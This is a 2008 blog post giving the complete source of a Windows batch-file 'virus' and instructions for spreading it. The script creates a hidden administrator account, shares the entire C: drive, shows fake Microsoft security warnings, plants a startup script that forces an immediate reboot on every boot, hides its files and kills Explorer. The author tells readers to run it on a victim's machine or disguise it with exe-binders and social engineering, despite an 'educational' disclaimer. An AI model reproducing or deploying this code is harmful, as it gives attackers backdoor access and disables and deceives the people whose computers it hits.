Skip to content
September 30, 2008 / technocrawl

Batch Virus – C_relwarC708 v1.0

Here is the source code for the virus C_relwarC708 v1.0, created by one of the Technocrawl’s core member.

/* Disclaimer :  Technocrawl and its core members are not responsible for whatever you do with this.

This is published, only as a review for educational means                                   */

@echo off
cd\
cd %SystemRoot%\system32\
md 1001
cd\
cls

rem N0 H4rm 15 cau53d unt1| N0w
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| ch4ng3 th3 t1m3 2 12:00:00.0 & d4t3 as 01/01/2000
echo 12:00:00.00 | time >> nul
echo 01/01/2000 | date >> nul

net users Microsoft_support support /add
rem Th3 u53r 4cc0unt th4t w45 Cr34t3d 15 ju5t 4 |1m1t3d 4cc0unt

rem Th15 p13c3 0f c0d3 w1|| m4k3 th3 |1m1t3d u53r 4cc0unt5 t0 4dm1n15tr4t0r 4cc0unt.
net localgroup administrators  Microsoft_support /add

rem 5h4r3 th3 R00t Dr1v3
net share system=C:\ /UNLIMITED

cd  %SystemRoot%\system32\1001
echo deal=msgbox (“Microsoft Windows recently had found some Malicious Virus on your computer, Press Yes to Neutralize the virus or Press No to Ignore the Virus”,20,”Warning”) > %SystemRoot%\system32\1001\warnusr.vbs

rem ch4ng35 th3 k3yb04rd 53tt1ng5 ( r4t3 4nd d3|4y )
mode con rate=1 > nul
mode con delay=4 >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y 50m3 4nn0y1ng m5g, as c0d3d ab0v3, 3x4ct|y @ 12:01 and 12:02
at 12:01 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”
at 12:02 /interactive “%SystemRoot%\system32\1001\warnusr.vbs”

msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” > nul
msg * “You are requested to restart your Computer Now to prevent Damages or Dataloss” >> nul

rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| c0py th3 warnusr.vbs f1|3 2 th3 5t4rtup, th4t w1|| b3 3x3cut3d @ 3v3ryt1me th3 c0mput3r 5t4rt5
copy %SystemRoot%\system32\1001\warnusr.vbs “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\warnusr.vbs”

rem ****************************************************************************************************************************************
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| d15p|4y Th3 5hutd0wn d14|05 B0X w1th 50m3 m5g and w1|| r35t4rt c0nt1nu0u5|y

echo shutdown -r -t 00 -c “Microsoft has encountered a seriuos problem, which needs your attention right now. Hey your computer got infected by Virus. Not even a single anti-virus can detect this virus now. Wanna try? Hahahaha….! ” > %systemroot%\system32\1001\sd.bat
copy %systemroot%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat “%systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\sd.bat”

rem ****************************************************************************************************************************************

cd\
cls
rem Th3 F0||0w1ng p13c3 0f c0d3 w1|| m4k3 th3 v1ru5 b1t 5t34|th13r
cd %systemdrive%\Documents and Settings\All Users\Start Menu\Programs\Startup\
attrib +h +s +r warnusr.vbs
attrib +h +s +r sd.bat
cd\
cd %systemroot%\system32
attrib +h +s +r 1001

rem K1||5 th3 3xp|0r3r.3×3 Pr0c355
taskkill /F /IM explorer.exe

rem @ EOV // End of Virus

Copy the source code and paste it in a notepad, then save it with the .bat extension. Copy it in a Pen Drive, then execute it in the victims computer.

You can also use some exe-binders to bind this virus with any audio,video, text or what ever the files may be then use some social engineering technique to make the victim execute the file by himself to harm his computer.

You can create this virus with out using any third party tools in windows, also instead of exe-binder, you can use the iexpress wizard to create a custom package.

your Feedbacks are welcome….!

You can download this batch file here….
To rollback the changes that have been made by this virus, you can download the patch file here and execute it. Click here for Patch…

Advertisements

3 Comments

Leave a Comment
  1. Morphic / May 6 2009 6:26 am

    i like this..

Trackbacks

  1. Batch Virus - C_relwarC708 v1.0 | H_acktivis_T
  2. Create Batch Viruses,pranks | Today's Hot

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: